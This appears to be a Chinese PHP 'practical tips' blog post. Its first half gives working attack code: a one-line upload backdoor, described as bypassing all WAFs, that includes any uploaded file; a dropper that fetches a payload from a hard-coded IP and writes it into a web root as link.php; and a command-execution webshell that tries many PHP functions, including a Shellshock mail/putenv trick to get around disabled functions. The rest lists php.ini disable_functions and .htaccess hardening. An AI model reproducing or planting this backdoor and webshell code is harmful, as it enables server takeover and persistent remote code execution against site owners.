getservbyname php,php几个实用小技巧

文件上传表单后门，比较不错通杀所有waf

@INCLUDE_ONCE($_FILES['only_pcd']['tmp_name']);

?>

保存之后

本地构建一个上传表单

你传什么

他就执行什么

php下载远程文件写入服务器

function Reads($url){

if (in_array('curl', get_loaded_extensions())) {

$handle = curl_init();

curl_setopt_array($handle, array(

CURLOPT_USERAGENT => USER_AGENT,

CURLOPT_FOLLOWLOCATION => true,

CURLOPT_HEADER => false,

CURLOPT_HTTPGET => true,

CURLOPT_RETURNTRANSFER => true,

CURLOPT_TIMEOUT => 30,

CURLOPT_URL => $url

));

$html = curl_exec($handle);

curl_close($handle);

return $html;

}

$opts = array('http' => array('method' => "GET",'timeout' => 8));

$context = stream_context_create($opts);

$html = file_get_contents($url, false, $context);

if(empty($html)){

$html = file_get_contents($url, false, $context);

}

return $html;

}

$c=Reads('http://11.11.222.111/cc.txt');

$fp = @fopen('D:/wwwroot/xxx.com/xxx/link.php',"w");

fwrite($fp,$c);

fclose($fp);

?>

php命令执行脚本代码，多个安全函数执行

function Exec_Run($cmd)

{

$res = '';

if(function_exists('exec')){@exec($cmd,$res);$res = join("\r\n",$res);}

elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}

elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}

elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}

elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}

elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}

elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}

elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}

return $res;

}

echo Exec_Run('whoami');

php.ini 安全函数禁用

disable_functions =exec,passthru,popen,proc_open,shell_exec,system,assert,chroot,getcwd,scandir

Disabled functions: COM,opendir,get_cfg_var,eval,phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,dll,popen,disk_free_space,checkdnsrr,checkdnsrr,getservbyname,getservbyport,disk_total_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname,getcwd,assert

少点 的『禁用后什么都执行不了，管理员根据需求可以进行修改』

mail,eval,assert,phpinfo,passthru,exec,system,shell_exec,proc_open,popen,dl,pcntl_exec,putenv,touch,chble_functionsown,chmod,chroot,get_cfg_var,ini_alter,ini_restore,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,socket_create,unlink,chown,touch,ini_set,opendir,readdir,scandir,dir,pipe,win_shell_execute,win32_create_service

禁止当前目录执行脚本

.htaccess

Order allow,deny

Deny from all

.htaccess 如果不能执行PHP就在这里面加

AddType text/html .shtml

AddHandler server-parsed .shtml

DirectoryIndex index.shtml index.html index.htm index.php

Options +IncludesNoExec -ExecCGI